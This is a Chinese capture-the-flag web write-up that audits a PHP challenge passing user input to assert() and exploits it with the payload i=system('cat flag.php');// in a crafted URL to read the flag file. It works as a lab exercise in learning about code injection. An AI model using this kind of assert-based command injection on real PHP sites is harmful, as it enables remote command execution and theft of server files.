CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”

文章目录

1.进入环境

进入靶场后看到页面显示代码如下:

2.常规检查

(1)ctrl+u检查页面代码,无明显异常。

(2)目录检查,使用dirsearch进行扫描,发现有flag.php出现。

访问后发现无任何回显,为题目的干扰项。

3.代码审计

接下里对代码进行审计,代码如下:

php 复制代码
<?php 
require_once('flag.php'); 
error_reporting(0); 

if(!isset($_GET['u'])){ 
    highlight_file(__FILE__); 
    die(); 
}else{ 
    $i=$_GET['i']; 
    $u=$_GET['u']; 
    if($_GET['u']!="Hello World"){ 
        die('die...'); 
    } 
    assert("$i == $u"); 
}

观察发现该代码为php代码,解释如下:

php 复制代码
require_once('flag.php'):引入 flag.php 文件,该文件可能包含敏感信息(如 flag)。
require_once :确保文件只被引入一次。
error_reporting(0):关闭所有错误报告,防止敏感信息通过错误信息泄露。
if(!isset($_GET['u'])):检查 GET 参数 u 是否存在。
highlight_file(__FILE__):如果 u 不存在,高亮显示当前文件内容(即源码)。
die():终止脚本执行。
$i=$_GET['i']:将 GET 参数 i 的值赋给变量 $i。
$u=$_GET['u']:将 GET 参数 u 的值赋给变量 $u。
if($_GET['u']!="Hello World"):检查 GET 参数 u 的值是否不等于 "Hello World"。
die('die...'):如果 u 的值不是 "Hello World",终止脚本并输出 die...。
assert("$i == $u"):执行断言(assert),检查 $i 是否等于 $u。

代码要求构造一个u,并且u得是Hello World;同时构造一个i,i得等于u。但成功构造后发现无事发生,代码里的逻辑也是,如果满足了这些条件,确实没有任何的回显和输出。

于是考虑在构造过程中加入命令,代码中给出了flag.php,但开头已经访问过了,是空白的,所以可能需要命令执行给打印出来。但是u必须等于Hello World,所以只能在i里面构造。
观察到这里使用了assert函数,能实现比较效果的函数有很多,但为什么偏偏是这个不常见的函数,可能突破点在这里!

查看assert()的官方解释:

发现这个函数会将里面的参数作为php代码执行!

4.url构造

于是,我们便可以利用i参数来构造命令,同时,在命令后加上注释符号,结束和u的比较。

构造u和i如下:

php 复制代码
u=Hello World
i=system('cat flag.php');//

最后,整个url构造为:

http://靶机地址/?u=Hello World&i=system('cat flag.php');//

访问,发现页面是空白,查看页面代码,找出flag!

最后的flag为:

flag{6833165eb0924067aa6897c389d76f30}

5.总结

本题的难点在于要发现其用了一个不常见的函数来执行比较操作,在有限的信息量下,任何一点可疑的地方都要揪着不放。最终发现了漏洞的所在。

相关推荐
天宁11 小时前
Workerman + ThinkPHP 8 结合使用
php·thinkphp
qq_3537375414 小时前
网站评分系统API
php
huaweichenai15 小时前
中国工商银行支付对接
php
搂着猫睡的小鱼鱼15 小时前
Ozon 商品页数据解析与提取 API
爬虫·php
岁杪杪19 小时前
关于运维:LINUX 零基础
运维·服务器·php
青茶36020 小时前
php怎么实现订单接口状态轮询(二)
前端·php·接口
一分半心动21 小时前
宝塔面板lnmp架构,tp6框架网站伪静态
nginx·php
枷锁—sha1 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
Hao.Zhou1 天前
phpstudy 进行 composer 全局配置
php·composer
zorro_z1 天前
ThinkPHP8学习篇(十六):错误调试与辅助组件
php